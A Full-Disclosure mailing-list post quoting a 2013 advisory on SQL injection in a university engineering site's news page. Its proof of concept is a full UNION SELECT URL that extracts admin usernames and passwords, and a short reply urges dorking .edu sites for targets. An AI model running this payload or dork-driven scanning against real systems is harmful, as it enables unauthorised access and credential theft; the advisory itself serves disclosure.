If you're going to start posting this shit. I suggest you visit
http://www.exploit-db.com/google-dorks/ and try appending site:edu to all
of them.


2013/8/29 Vulnerability Lab <resea...@vulnerability-lab.com>

> Title:
> ======
> UTA EDU University ENG - SQL Injection Vulnerability
>
>
> Date:
> =====
> 2013-08-28
>
>
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=256
>
>
> VL-ID:
> =====
> 256
>
>
> Common Vulnerability Scoring System:
> ====================================
> 8.4
>
>
> Introduction:
> =============
> The University of Texas at Arlington´s College of Engineering provides one
> of the most comprehensive engineering programs in
> North Texas and the nation, with eight baccalaureate programs, 13 master`s
> and 9 doctorates. It is the fourth largest engineering
> college in Texas, with about 3,900 students.
>
> (Copy of the Homepage: http://www.uta.edu )
>
>
> Abstract:
> =========
> The Vulnerability Laboratory Research Team discovered a SQL Injection web
> vulnerability in the famous Arlington Engeneering University in Texas.
>
>
> Report-Timeline:
> ================
> 2011-12-26:     Researcher Notification & Coordination (Chokri Ben Achour)
> 2012-11-27:     Vendor Notification (Support Team)
> 2012-**-**:     Vendor Response/Feedback (Support Team)
> 2013-08-22:     Vendor Fix/Patch (No Response, verify by Check]
> 2013-08-28:     Public Disclosure (Vulnerability Laboratory)
>
>
>
> Status:
> ========
> Published
>
>
> Exploitation-Technique:
> =======================
> Remote
>
>
> Severity:
> =========
> Critical
>
>
> Details:
> ========
> A critical SQL Injection web vulnerability is detected in the famous
> Arlington Engeneering University in Texas.
> The vulnerability allows remote attackers to inject or execute own sql
> commands to compromise the web-application or web-server dbms.
>
> The vulnerability is located in the engineeringnews module when processing
> to request ID parameter with own SQL commands.
> Remote attackers are able to inject the commands to compromise the
> web-application and affected database management system.
> The flaw is result of the wrong validation of the id value when processing
> to load the engineeringnews.php file.
>
>
> Vulnerable Module(s):
>                                                      [+]
> ../engineeringnews/
>
> Vulnerable File(s):
>                                                      [+]
> engineeringnews.php
>
> Vulnerable Parameter(s):
>                                                      [+] id
>
>
> Proof of Concept:
> =================
> The remote sql injection vulnerability can be exploited by remote
> attackers without user interaction or privileged user account.
> For demonstration or reproduce ...
>
> PoC:
> http://www.uta.edu/engineering/engineeringnews/engineeringnews.php?id=
>
> -1337+union+select+1,2,3,concat_ws(0x3a3a,id,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adlogin+limit+0,1--
>
>
> Solution:
> =========
> 2013-08-22:     Vendor Fix/Patch (No Response, verify by Check]
>
>
> Risk:
> =====
> The security risk of the remote sql injection web vulnerability is
> estimated as critical.
>
>
> Credits:
> ========
> Vulnerability Laboratory [Research Team] - Chokri Ben Achour (
> cho...@evolution-sec.com)
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains:    www.vulnerability-lab.com           - www.vuln-lab.com
>                       - www.evolution-sec.com
> Contact:    ad...@vulnerability-lab.com         -
> resea...@vulnerability-lab.com               - ad...@evolution-sec.com
> Section:    www.vulnerability-lab.com/dev       -
> forum.vulnerability-db.com                   -
> magazine.vulnerability-db.com
> Social:     twitter.com/#!/vuln_lab             -
> facebook.com/VulnerabilityLab                -
> youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php   -
> vulnerability-lab.com/rss/rss_upcoming.php   -
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified
> form is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers.
> All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (ad...@vulnerability-lab.com or
> resea...@vulnerability-lab.com) to get a permission.
>
>                                 Copyright © 2013 | Vulnerability
> Laboratory [Evolution Security]
>
>
>
>
>
>
>
> --
> VULNERABILITY LABORATORY RESEARCH TEAM
> DOMAIN: www.vulnerability-lab.com
> CONTACT: resea...@vulnerability-lab.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to